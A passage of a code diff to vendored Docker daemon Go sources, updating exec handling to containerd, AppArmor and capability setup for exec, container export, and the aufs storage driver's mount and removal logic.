@@ -157,26 +164,36 @@ func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.R
 	if ec.ExitCode != nil {
 		ec.Unlock()
 		err := fmt.Errorf("Error: Exec command %s has already run", ec.ID)
-		return errors.NewRequestConflictError(err)
+		return errdefs.Conflict(err)
 	}
 
 	if ec.Running {
 		ec.Unlock()
-		return fmt.Errorf("Error: Exec command %s is already running", ec.ID)
+		return errdefs.Conflict(fmt.Errorf("Error: Exec command %s is already running", ec.ID))
 	}
 	ec.Running = true
+	ec.Unlock()
+
+	c := d.containers.Get(ec.ContainerID)
+	logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID)
+	attributes := map[string]string{
+		"execID": ec.ID,
+	}
+	d.LogContainerEventWithAttributes(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " "), attributes)
+
 	defer func() {
 		if err != nil {
+			ec.Lock()
 			ec.Running = false
 			exitCode := 126
 			ec.ExitCode = &exitCode
+			if err := ec.CloseStreams(); err != nil {
+				logrus.Errorf("failed to cleanup exec %s streams: %s", c.ID, err)
+			}
+			ec.Unlock()
+			c.ExecCommands.Delete(ec.ID, ec.Pid)
 		}
 	}()
-	ec.Unlock()
-
-	c := d.containers.Get(ec.ContainerID)
-	logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID)
-	d.LogContainerEvent(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " "))
 
 	if ec.OpenStdin && stdin != nil {
 		r, w := io.Pipe()
@@ -200,44 +217,71 @@ func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.R
 		ec.StreamConfig.NewNopInputPipe()
 	}
 
-	p := libcontainerd.Process{
+	p := &specs.Process{
 		Args:     append([]string{ec.Entrypoint}, ec.Args...),
 		Env:      ec.Env,
 		Terminal: ec.Tty,
+		Cwd:      ec.WorkingDir,
+	}
+	if p.Cwd == "" {
+		p.Cwd = "/"
 	}
 
-	if err := execSetPlatformOpt(c, ec, &p); err != nil {
+	if err := d.execSetPlatformOpt(c, ec, p); err != nil {
 		return err
 	}
 
-	attachErr := container.AttachStreams(ctx, ec.StreamConfig, ec.OpenStdin, true, ec.Tty, cStdin, cStdout, cStderr, ec.DetachKeys)
+	attachConfig := stream.AttachConfig{
+		TTY:        ec.Tty,
+		UseStdin:   cStdin != nil,
+		UseStdout:  cStdout != nil,
+		UseStderr:  cStderr != nil,
+		Stdin:      cStdin,
+		Stdout:     cStdout,
+		Stderr:     cStderr,
+		DetachKeys: ec.DetachKeys,
+		CloseStdin: true,
+	}
+	ec.StreamConfig.AttachStreams(&attachConfig)
+	attachErr := ec.StreamConfig.CopyStreams(ctx, &attachConfig)
 
-	systemPid, err := d.containerd.AddProcess(ctx, c.ID, name, p, ec.InitializeStdio)
+	// Synchronize with libcontainerd event loop
+	ec.Lock()
+	c.ExecCommands.Lock()
+	systemPid, err := d.containerd.Exec(ctx, c.ID, ec.ID, p, cStdin != nil, ec.InitializeStdio)
+	// the exec context should be ready, or error happened.
+	// close the chan to notify readiness
+	close(ec.Started)
 	if err != nil {
-		return err
+		c.ExecCommands.Unlock()
+		ec.Unlock()
+		return translateContainerdStartErr(ec.Entrypoint, ec.SetExitCode, err)
 	}
-	ec.Lock()
 	ec.Pid = systemPid
+	c.ExecCommands.Unlock()
 	ec.Unlock()
 
 	select {
 	case <-ctx.Done():
 		logrus.Debugf("Sending TERM signal to process %v in container %v", name, c.ID)
-		d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["TERM"]))
+		d.containerd.SignalProcess(ctx, c.ID, name, int(signal.SignalMap["TERM"]))
 		select {
 		case <-time.After(termProcessTimeout * time.Second):
 			logrus.Infof("Container %v, process %v failed to exit within %d seconds of signal TERM - using the force", c.ID, name, termProcessTimeout)
-			d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["KILL"]))
+			d.containerd.SignalProcess(ctx, c.ID, name, int(signal.SignalMap["KILL"]))
 		case <-attachErr:
 			// TERM signal worked
 		}
-		return fmt.Errorf("context cancelled")
+		return ctx.Err()
 	case err := <-attachErr:
 		if err != nil {
-			if _, ok := err.(container.DetachError); !ok {
-				return fmt.Errorf("exec attach failed with error: %v", err)
+			if _, ok := err.(term.EscapeError); !ok {
+				return errdefs.System(errors.Wrap(err, "exec attach failed"))
+			}
+			attributes := map[string]string{
+				"execID": ec.ID,
 			}
-			d.LogContainerEvent(c, "exec_detach")
+			d.LogContainerEventWithAttributes(c, "exec_detach", attributes)
 		}
 	}
 	return nil
@@ -254,7 +298,7 @@ func (d *Daemon) execCommandGC() {
 		for id, config := range d.execCommands.Commands() {
 			if config.CanRemove {
 				cleaned++
-				d.execCommands.Delete(id)
+				d.execCommands.Delete(id, config.Pid)
 			} else {
 				if _, exists := liveExecCommands[id]; !exists {
 					config.CanRemove = true
diff --git a/vendor/github.com/docker/docker/daemon/exec/exec.go b/vendor/github.com/docker/docker/daemon/exec/exec.go
index 933136f965..c036c46a0c 100644
--- a/vendor/github.com/docker/docker/daemon/exec/exec.go
+++ b/vendor/github.com/docker/docker/daemon/exec/exec.go
@@ -1,13 +1,13 @@
-package exec
+package exec // import "github.com/docker/docker/daemon/exec"
 
 import (
 	"runtime"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/containerd/containerd/cio"
 	"github.com/docker/docker/container/stream"
-	"github.com/docker/docker/libcontainerd"
 	"github.com/docker/docker/pkg/stringid"
+	"github.com/sirupsen/logrus"
 )
 
 // Config holds the configurations for execs. The Daemon keeps
@@ -15,6 +15,7 @@ import (
 // examined both during and after completion.
 type Config struct {
 	sync.Mutex
+	Started      chan struct{}
 	StreamConfig *stream.Config
 	ID           string
 	Running      bool
@@ -30,6 +31,7 @@ type Config struct {
 	Tty          bool
 	Privileged   bool
 	User         string
+	WorkingDir   string
 	Env          []string
 	Pid          int
 }
@@ -39,11 +41,30 @@ func NewConfig() *Config {
 	return &Config{
 		ID:           stringid.GenerateNonCryptoID(),
 		StreamConfig: stream.NewConfig(),
+		Started:      make(chan struct{}),
 	}
 }
 
+type rio struct {
+	cio.IO
+
+	sc *stream.Config
+}
+
+func (i *rio) Close() error {
+	i.IO.Close()
+
+	return i.sc.CloseStreams()
+}
+
+func (i *rio) Wait() {
+	i.sc.Wait()
+
+	i.IO.Wait()
+}
+
 // InitializeStdio is called by libcontainerd to connect the stdio.
-func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error {
+func (c *Config) InitializeStdio(iop *cio.DirectIO) (cio.IO, error) {
 	c.StreamConfig.CopyToPipe(iop)
 
 	if c.StreamConfig.Stdin() == nil && !c.Tty && runtime.GOOS == "windows" {
@@ -54,7 +75,7 @@ func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error {
 		}
 	}
 
-	return nil
+	return &rio{IO: iop, sc: c.StreamConfig}, nil
 }
 
 // CloseStreams closes the stdio streams for the exec
@@ -62,47 +83,54 @@ func (c *Config) CloseStreams() error {
 	return c.StreamConfig.CloseStreams()
 }
 
+// SetExitCode sets the exec config's exit code
+func (c *Config) SetExitCode(code int) {
+	c.ExitCode = &code
+}
+
 // Store keeps track of the exec configurations.
 type Store struct {
-	commands map[string]*Config
+	byID map[string]*Config
 	sync.RWMutex
 }
 
 // NewStore initializes a new exec store.
 func NewStore() *Store {
-	return &Store{commands: make(map[string]*Config, 0)}
+	return &Store{
+		byID: make(map[string]*Config),
+	}
 }
 
 // Commands returns the exec configurations in the store.
 func (e *Store) Commands() map[string]*Config {
 	e.RLock()
-	commands := make(map[string]*Config, len(e.commands))
-	for id, config := range e.commands {
-		commands[id] = config
+	byID := make(map[string]*Config, len(e.byID))
+	for id, config := range e.byID {
+		byID[id] = config
 	}
 	e.RUnlock()
-	return commands
+	return byID
 }
 
 // Add adds a new exec configuration to the store.
 func (e *Store) Add(id string, Config *Config) {
 	e.Lock()
-	e.commands[id] = Config
+	e.byID[id] = Config
 	e.Unlock()
 }
 
 // Get returns an exec configuration by its id.
 func (e *Store) Get(id string) *Config {
 	e.RLock()
-	res := e.commands[id]
+	res := e.byID[id]
 	e.RUnlock()
 	return res
 }
 
 // Delete removes an exec configuration from the store.
-func (e *Store) Delete(id string) {
+func (e *Store) Delete(id string, pid int) {
 	e.Lock()
-	delete(e.commands, id)
+	delete(e.byID, id)
 	e.Unlock()
 }
 
@@ -110,7 +138,7 @@ func (e *Store) Delete(id string) {
 func (e *Store) List() []string {
 	var IDs []string
 	e.RLock()
-	for id := range e.commands {
+	for id := range e.byID {
 		IDs = append(IDs, id)
 	}
 	e.RUnlock()
diff --git a/vendor/github.com/docker/docker/daemon/exec_linux.go b/vendor/github.com/docker/docker/daemon/exec_linux.go
index 5aeedc3470..cd52f4886f 100644
--- a/vendor/github.com/docker/docker/daemon/exec_linux.go
+++ b/vendor/github.com/docker/docker/daemon/exec_linux.go
@@ -1,27 +1,59 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/caps"
 	"github.com/docker/docker/daemon/exec"
-	"github.com/docker/docker/libcontainerd"
+	"github.com/opencontainers/runc/libcontainer/apparmor"
 	"github.com/opencontainers/runtime-spec/specs-go"
 )
 
-func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error {
+func (daemon *Daemon) execSetPlatformOpt(c *container.Container, ec *exec.Config, p *specs.Process) error {
 	if len(ec.User) > 0 {
 		uid, gid, additionalGids, err := getUser(c, ec.User)
 		if err != nil {
 			return err
 		}
-		p.User = &specs.User{
+		p.User = specs.User{
 			UID:            uid,
 			GID:            gid,
 			AdditionalGids: additionalGids,
 		}
 	}
 	if ec.Privileged {
-		p.Capabilities = caps.GetAllCapabilities()
+		if p.Capabilities == nil {
+			p.Capabilities = &specs.LinuxCapabilities{}
+		}
+		p.Capabilities.Bounding = caps.GetAllCapabilities()
+		p.Capabilities.Permitted = p.Capabilities.Bounding
+		p.Capabilities.Inheritable = p.Capabilities.Bounding
+		p.Capabilities.Effective = p.Capabilities.Bounding
+	}
+	if apparmor.IsEnabled() {
+		var appArmorProfile string
+		if c.AppArmorProfile != "" {
+			appArmorProfile = c.AppArmorProfile
+		} else if c.HostConfig.Privileged {
+			// `docker exec --privileged` does not currently disable AppArmor
+			// profiles. Privileged configuration of the container is inherited
+			appArmorProfile = "unconfined"
+		} else {
+			appArmorProfile = "docker-default"
+		}
+
+		if appArmorProfile == "docker-default" {
+			// Unattended upgrades and other fun services can unload AppArmor
+			// profiles inadvertently. Since we cannot store our profile in
+			// /etc/apparmor.d, nor can we practically add other ways of
+			// telling the system to keep our profile loaded, in order to make
+			// sure that we keep the default profile enabled we dynamically
+			// reload it if necessary.
+			if err := ensureDefaultAppArmorProfile(); err != nil {
+				return err
+			}
+		}
+		p.ApparmorProfile = appArmorProfile
 	}
+	daemon.setRlimits(&specs.Spec{Process: p}, c)
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/exec_linux_test.go b/vendor/github.com/docker/docker/daemon/exec_linux_test.go
new file mode 100644
index 0000000000..0db7f080db
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/exec_linux_test.go
@@ -0,0 +1,53 @@
+// +build linux
+
+package daemon
+
+import (
+	"testing"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/daemon/exec"
+	"github.com/opencontainers/runc/libcontainer/apparmor"
+	"github.com/opencontainers/runtime-spec/specs-go"
+	"gotest.tools/assert"
+)
+
+func TestExecSetPlatformOpt(t *testing.T) {
+	if !apparmor.IsEnabled() {
+		t.Skip("requires AppArmor to be enabled")
+	}
+	d := &Daemon{}
+	c := &container.Container{AppArmorProfile: "my-custom-profile"}
+	ec := &exec.Config{}
+	p := &specs.Process{}
+
+	err := d.execSetPlatformOpt(c, ec, p)
+	assert.NilError(t, err)
+	assert.Equal(t, "my-custom-profile", p.ApparmorProfile)
+}
+
+// TestExecSetPlatformOptPrivileged verifies that `docker exec --privileged`
+// does not disable AppArmor profiles. Exec currently inherits the `Privileged`
+// configuration of the container. See https://github.com/moby/moby/pull/31773#discussion_r105586900
+//
+// This behavior may change in future, but test for the behavior to prevent it
+// from being changed accidentally.
+func TestExecSetPlatformOptPrivileged(t *testing.T) {
+	if !apparmor.IsEnabled() {
+		t.Skip("requires AppArmor to be enabled")
+	}
+	d := &Daemon{}
+	c := &container.Container{AppArmorProfile: "my-custom-profile"}
+	ec := &exec.Config{Privileged: true}
+	p := &specs.Process{}
+
+	err := d.execSetPlatformOpt(c, ec, p)
+	assert.NilError(t, err)
+	assert.Equal(t, "my-custom-profile", p.ApparmorProfile)
+
+	c.HostConfig = &containertypes.HostConfig{Privileged: true}
+	err = d.execSetPlatformOpt(c, ec, p)
+	assert.NilError(t, err)
+	assert.Equal(t, "unconfined", p.ApparmorProfile)
+}
diff --git a/vendor/github.com/docker/docker/daemon/exec_solaris.go b/vendor/github.com/docker/docker/daemon/exec_solaris.go
deleted file mode 100644
index 7003355d91..0000000000
--- a/vendor/github.com/docker/docker/daemon/exec_solaris.go
+++ /dev/null
@@ -1,11 +0,0 @@
-package daemon
-
-import (
-	"github.com/docker/docker/container"
-	"github.com/docker/docker/daemon/exec"
-	"github.com/docker/docker/libcontainerd"
-)
-
-func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error {
-	return nil
-}
diff --git a/vendor/github.com/docker/docker/daemon/exec_windows.go b/vendor/github.com/docker/docker/daemon/exec_windows.go
index 1d6974cda9..c37ea9f31a 100644
--- a/vendor/github.com/docker/docker/daemon/exec_windows.go
+++ b/vendor/github.com/docker/docker/daemon/exec_windows.go
@@ -1,14 +1,16 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"github.com/docker/docker/container"
 	"github.com/docker/docker/daemon/exec"
-	"github.com/docker/docker/libcontainerd"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
 )
 
-func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error {
+func (daemon *Daemon) execSetPlatformOpt(c *container.Container, ec *exec.Config, p *specs.Process) error {
 	// Process arguments need to be escaped before sending to OCI.
-	p.Args = escapeArgs(p.Args)
-	p.User.Username = ec.User
+	if c.OS == "windows" {
+		p.Args = escapeArgs(p.Args)
+		p.User.Username = ec.User
+	}
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/export.go b/vendor/github.com/docker/docker/daemon/export.go
index 5ef6dbb0e5..737e161edc 100644
--- a/vendor/github.com/docker/docker/daemon/export.go
+++ b/vendor/github.com/docker/docker/daemon/export.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
@@ -6,22 +6,34 @@ import (
 	"runtime"
 
 	"github.com/docker/docker/container"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/system"
 )
 
 // ContainerExport writes the contents of the container to the given
 // writer. An error is returned if the container cannot be found.
 func (daemon *Daemon) ContainerExport(name string, out io.Writer) error {
-	if runtime.GOOS == "windows" {
-		return fmt.Errorf("the daemon on this platform does not support export of a container")
-	}
-
 	container, err := daemon.GetContainer(name)
 	if err != nil {
 		return err
 	}
 
+	if runtime.GOOS == "windows" && container.OS == "windows" {
+		return fmt.Errorf("the daemon on this operating system does not support exporting Windows containers")
+	}
+
+	if container.IsDead() {
+		err := fmt.Errorf("You cannot export container %s which is Dead", container.ID)
+		return errdefs.Conflict(err)
+	}
+
+	if container.IsRemovalInProgress() {
+		err := fmt.Errorf("You cannot export container %s which is being removed", container.ID)
+		return errdefs.Conflict(err)
+	}
+
 	data, err := daemon.containerExport(container)
 	if err != nil {
 		return fmt.Errorf("Error exporting container %s: %v", name, err)
@@ -35,24 +47,38 @@ func (daemon *Daemon) ContainerExport(name string, out io.Writer) error {
 	return nil
 }
 
-func (daemon *Daemon) containerExport(container *container.Container) (io.ReadCloser, error) {
-	if err := daemon.Mount(container); err != nil {
+func (daemon *Daemon) containerExport(container *container.Container) (arch io.ReadCloser, err error) {
+	if !system.IsOSSupported(container.OS) {
+		return nil, fmt.Errorf("cannot export %s: %s ", container.ID, system.ErrNotSupportedOperatingSystem)
+	}
+	rwlayer, err := daemon.imageService.GetLayerByID(container.ID, container.OS)
+	if err != nil {
+		return nil, err
+	}
+	defer func() {
+		if err != nil {
+			daemon.imageService.ReleaseLayer(rwlayer, container.OS)
+		}
+	}()
+
+	basefs, err := rwlayer.Mount(container.GetMountLabel())
+	if err != nil {
 		return nil, err
 	}
 
-	uidMaps, gidMaps := daemon.GetUIDGIDMaps()
-	archive, err := archive.TarWithOptions(container.BaseFS, &archive.TarOptions{
+	archive, err := archivePath(basefs, basefs.Path(), &archive.TarOptions{
 		Compression: archive.Uncompressed,
-		UIDMaps:     uidMaps,
-		GIDMaps:     gidMaps,
+		UIDMaps:     daemon.idMappings.UIDs(),
+		GIDMaps:     daemon.idMappings.GIDs(),
 	})
 	if err != nil {
-		daemon.Unmount(container)
+		rwlayer.Unmount()
 		return nil, err
 	}
-	arch := ioutils.NewReadCloserWrapper(archive, func() error {
+	arch = ioutils.NewReadCloserWrapper(archive, func() error {
 		err := archive.Close()
-		daemon.Unmount(container)
+		rwlayer.Unmount()
+		daemon.imageService.ReleaseLayer(rwlayer, container.OS)
 		return err
 	})
 	daemon.LogContainerEvent(container, "export")
diff --git a/vendor/github.com/docker/docker/daemon/getsize_unix.go b/vendor/github.com/docker/docker/daemon/getsize_unix.go
deleted file mode 100644
index 707323a4bf..0000000000
--- a/vendor/github.com/docker/docker/daemon/getsize_unix.go
+++ /dev/null
@@ -1,41 +0,0 @@
-// +build linux freebsd solaris
-
-package daemon
-
-import (
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/container"
-)
-
-// getSize returns the real size & virtual size of the container.
-func (daemon *Daemon) getSize(container *container.Container) (int64, int64) {
-	var (
-		sizeRw, sizeRootfs int64
-		err                error
-	)
-
-	if err := daemon.Mount(container); err != nil {
-		logrus.Errorf("Failed to compute size of container rootfs %s: %s", container.ID, err)
-		return sizeRw, sizeRootfs
-	}
-	defer daemon.Unmount(container)
-
-	sizeRw, err = container.RWLayer.Size()
-	if err != nil {
-		logrus.Errorf("Driver %s couldn't return diff size of container %s: %s",
-			daemon.GraphDriverName(), container.ID, err)
-		// FIXME: GetSize should return an error. Not changing it now in case
-		// there is a side-effect.
-		sizeRw = -1
-	}
-
-	if parent := container.RWLayer.Parent(); parent != nil {
-		sizeRootfs, err = parent.Size()
-		if err != nil {
-			sizeRootfs = -1
-		} else if sizeRw != -1 {
-			sizeRootfs += sizeRw
-		}
-	}
-	return sizeRw, sizeRootfs
-}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go
index ec55ea4cde..9152252770 100644
--- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go
@@ -20,10 +20,11 @@ aufs driver directory structure
 
 */
 
-package aufs
+package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs"
 
 import (
 	"bufio"
+	"context"
 	"fmt"
 	"io"
 	"io/ioutil"
@@ -33,21 +34,23 @@ import (
 	"path/filepath"
 	"strings"
 	"sync"
-	"syscall"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/vbatts/tar-split/tar/storage"
-
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/directory"
 	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/locker"
 	mountpk "github.com/docker/docker/pkg/mount"
-
-	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/docker/docker/pkg/system"
 	rsystem "github.com/opencontainers/runc/libcontainer/system"
+	"github.com/opencontainers/selinux/go-selinux/label"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+	"github.com/vbatts/tar-split/tar/storage"
+	"golang.org/x/sys/unix"
 )
 
 var (
@@ -59,6 +62,8 @@ var (
 
 	enableDirpermLock sync.Once
 	enableDirperm     bool
+
+	logger = logrus.WithField("storage-driver", "aufs")
 )
 
 func init() {
@@ -75,18 +80,28 @@ type Driver struct {
 	pathCacheLock sync.Mutex
 	pathCache     map[string]string
 	naiveDiff     graphdriver.DiffDriver
+	locker        *locker.Locker
 }
 
 // Init returns a new AUFS driver.
 // An error is returned if AUFS is not supported.
 func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
-
 	// Try to load the aufs kernel module
 	if err := supportsAufs(); err != nil {
+		logger.Error(err)
 		return nil, graphdriver.ErrNotSupported
 	}
 
-	fsMagic, err := graphdriver.GetFSMagic(root)
+	// Perform feature detection on /var/lib/docker/aufs if it's an existing directory.
+	// This covers situations where /var/lib/docker/aufs is a mount, and on a different
+	// filesystem than /var/lib/docker.
+	// If the path does not exist, fall back to using /var/lib/docker for feature detection.
+	testdir := root
+	if _, err := os.Stat(testdir); os.IsNotExist(err) {
+		testdir = filepath.Dir(testdir)
+	}
+
+	fsMagic, err := graphdriver.GetFSMagic(testdir)
 	if err != nil {
 		return nil, err
 	}
@@ -96,7 +111,7 @@ func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 
 	switch fsMagic {
 	case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicEcryptfs:
-		logrus.Errorf("AUFS is not supported over %s", backingFs)
+		logger.Errorf("AUFS is not supported over %s", backingFs)
 		return nil, graphdriver.ErrIncompatibleFS
 	}
 
@@ -112,33 +127,45 @@ func Init(root string, options []string, uidMaps, gidMaps []idtools.IDMap) (grap
 		gidMaps:   gidMaps,
 		pathCache: make(map[string]string),
 		ctr:       graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicAufs)),
+		locker:    locker.New(),
 	}
 
 	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
 	if err != nil {
 		return nil, err
 	}
-	// Create the root aufs driver dir and return
-	// if it already exists
-	// If not populate the dir structure
-	if err := idtools.MkdirAllAs(root, 0700, rootUID, rootGID); err != nil {
-		if os.IsExist(err) {
-			return a, nil
-		}
-		return nil, err
-	}
-
-	if err := mountpk.MakePrivate(root); err != nil {
+	// Create the root aufs driver dir
+	if err := idtools.MkdirAllAndChown(root, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
 		return nil, err
 	}
 
 	// Populate the dir structure
 	for _, p := range paths {
-		if err := idtools.MkdirAllAs(path.Join(root, p), 0700, rootUID, rootGID); err != nil {
+		if err := idtools.MkdirAllAndChown(path.Join(root, p), 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
 			return nil, err
 		}
 	}
 
+	for _, path := range []string{"mnt", "diff"} {
+		p := filepath.Join(root, path)
+		entries, err := ioutil.ReadDir(p)
+		if err != nil {
+			logger.WithError(err).WithField("dir", p).Error("error reading dir entries")
+			continue
+		}
+		for _, entry := range entries {
+			if !entry.IsDir() {
+				continue
+			}
+			if strings.HasSuffix(entry.Name(), "-removing") {
+				logger.WithField("dir", entry.Name()).Debug("Cleaning up stale layer dir")
+				if err := system.EnsureRemoveAll(filepath.Join(p, entry.Name())); err != nil {
+					logger.WithField("dir", entry.Name()).WithError(err).Error("Error removing stale layer dir")
+				}
+			}
+		}
+	}
+
 	a.naiveDiff = graphdriver.NewNaiveDiffDriver(a, uidMaps, gidMaps)
 	return a, nil
 }
@@ -262,48 +289,17 @@ func (a *Driver) createDirsFor(id string) error {
 	// The path of directories are <aufs_root_path>/mnt/<image_id>
 	// and <aufs_root_path>/diff/<image_id>
 	for _, p := range paths {
-		if err := idtools.MkdirAllAs(path.Join(a.rootPath(), p, id), 0755, rootUID, rootGID); err != nil {
+		if err := idtools.MkdirAllAndChown(path.Join(a.rootPath(), p, id), 0755, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil {
 			return err
 		}
 	}
 	return nil
 }
 
-// Helper function to debug EBUSY errors on remove.
-func debugEBusy(mountPath string) (out []string, err error) {
-	// lsof is not part of GNU coreutils. This is a best effort
-	// attempt to detect offending processes.
-	c := exec.Command("lsof")
-
-	r, err := c.StdoutPipe()
-	if err != nil {
-		return nil, fmt.Errorf("Assigning pipes failed with %v", err)
-	}
-
-	if err := c.Start(); err != nil {
-		return nil, fmt.Errorf("Starting %s failed with %v", c.Path, err)
-	}
-
-	defer func() {
-		waiterr := c.Wait()
-		if waiterr != nil && err == nil {
-			err = fmt.Errorf("Waiting for %s failed with %v", c.Path, waiterr)
-		}
-	}()
-
-	sc := bufio.NewScanner(r)
-	for sc.Scan() {
-		entry := sc.Text()
-		if strings.Contains(entry, mountPath) {
-			out = append(out, entry, "\n")
-		}
-	}
-
-	return out, nil
-}
-
 // Remove will unmount and remove the given id.
 func (a *Driver) Remove(id string) error {
+	a.locker.Lock(id)
+	defer a.locker.Unlock(id)
 	a.pathCacheLock.Lock()
 	mountpoint, exists := a.pathCache[id]
 	a.pathCacheLock.Unlock()
@@ -311,61 +307,55 @@ func (a *Driver) Remove(id string) error {
 		mountpoint = a.getMountpoint(id)
 	}
 
+	logger := logger.WithField("layer", id)
+
 	var retries int
 	for {
 		mounted, err := a.mounted(mountpoint)
 		if err != nil {
+			if os.IsNotExist(err) {
+				break
+			}
 			return err
 		}
 		if !mounted {
 			break
 		}
 
-		if err := a.unmount(mountpoint); err != nil {
-			if err != syscall.EBUSY {
-				return fmt.Errorf("aufs: unmount error: %s: %v", mountpoint, err)
-			}
-			if retries >= 5 {
-				out, debugErr := debugEBusy(mountpoint)
-				if debugErr == nil {
-					logrus.Warnf("debugEBusy returned %v", out)
-				}
-				return fmt.Errorf("aufs: unmount error after retries: %s: %v", mountpoint, err)
-			}
-			// If unmount returns EBUSY, it could be a transient error. Sleep and retry.
-			retries++
-			logrus.Warnf("unmount failed due to EBUSY: retry count: %d", retries)
-			time.Sleep(100 * time.Millisecond)
-			continue
+		err = a.unmount(mountpoint)
+		if err == nil {
+			break
 		}
-		break
-	}
 
-	// Atomically remove each directory in turn by first moving it out of the
-	// way (so that docker doesn't find it anymore) before doing removal of
-	// the whole tree.
-	tmpMntPath := path.Join(a.mntPath(), fmt.Sprintf("%s-removing", id))
-	if err := os.Rename(mountpoint, tmpMntPath); err != nil && !os.IsNotExist(err) {
-		if err == syscall.EBUSY {
-			logrus.Warn("os.Rename err due to EBUSY")
-			out, debugErr := debugEBusy(mountpoint)
-			if debugErr == nil {
-				logrus.Warnf("debugEBusy returned %v", out)
-			}
+		if err != unix.EBUSY {
+			return errors.Wrapf(err, "aufs: unmount error: %s", mountpoint)
 		}
-		return err
-	}
-	defer os.RemoveAll(tmpMntPath)
-
-	tmpDiffpath := path.Join(a.diffPath(), fmt.Sprintf("%s-removing", id))
-	if err := os.Rename(a.getDiffPath(id), tmpDiffpath); err != nil && !os.IsNotExist(err) {
-		return err
+		if retries >= 5 {
+			return errors.Wrapf(err, "aufs: unmount error after retries: %s", mountpoint)
+		}
+		// If unmount returns EBUSY, it could be a transient error. Sleep and retry.
+		retries++
+		logger.Warnf("unmount failed due to EBUSY: retry count: %d", retries)
+		time.Sleep(100 * time.Millisecond)
 	}
-	defer os.RemoveAll(tmpDiffpath)
 
 	// Remove the layers file for the id
 	if err := os.Remove(path.Join(a.rootPath(), "layers", id)); err != nil && !os.IsNotExist(err) {
-		return err
+		return errors.Wrapf(err, "error removing layers dir for %s", id)
+	}
+
+	if err := atomicRemove(a.getDiffPath(id)); err != nil {
+		return errors.Wrapf(err, "could not remove diff path for id %s", id)
+	}
+
+	// Atomically remove each directory in turn by first moving it out of the
+	// way (so that docker doesn't find it anymore) before doing removal of
+	// the whole tree.
+	if err := atomicRemove(mountpoint); err != nil {
+		if errors.Cause(err) == unix.EBUSY {
+			logger.WithField("dir", mountpoint).WithError(err).Warn("error performing atomic remove due to EBUSY")
+		}
+		return errors.Wrapf(err, "could not remove mountpoint for id %s", id)
 	}
 
 	a.pathCacheLock.Lock()
@@ -374,12 +364,32 @@ func (a *Driver) Remove(id string) error {
 	return nil
 }
 
+func atomicRemove(source string) error {
+	target := source + "-removing"
+
+	err := os.Rename(source, target)
+	switch {
+	case err == nil, os.IsNotExist(err):
+	case os.IsExist(err):
+		// Got error saying the target dir already exists, maybe the source doesn't exist due to a previous (failed) remove
+		if _, e := os.Stat(source); !os.IsNotExist(e) {
+			return errors.Wrapf(err, "target rename dir '%s' exists but should not, this needs to be manually cleaned up")
+		}
+	default:
+		return errors.Wrapf(err, "error preparing atomic delete")
+	}
+
+	return system.EnsureRemoveAll(target)
+}
+
 // Get returns the rootfs path for the id.
 // This will mount the dir at its given path
-func (a *Driver) Get(id, mountLabel string) (string, error) {
+func (a *Driver) Get(id, mountLabel string) (containerfs.ContainerFS, error) {
+	a.locker.Lock(id)
+	defer a.locker.Unlock(id)
 	parents, err := a.getParentLayerPaths(id)
 	if err != nil && !os.IsNotExist(err) {
-		return "", err
+		return nil, err
 	}
 
 	a.pathCacheLock.Lock()
@@ -393,25 +403,27 @@ func (a *Driver) Get(id, mountLabel string) (string, error) {
 		}
 	}
 	if count := a.ctr.Increment(m); count > 1 {
-		return m, nil
+		return containerfs.NewLocalContainerFS(m), nil
 	}
 
 	// If a dir does not have a parent ( no layers )do not try to mount
 	// just return the diff path to the data
 	if len(parents) > 0 {
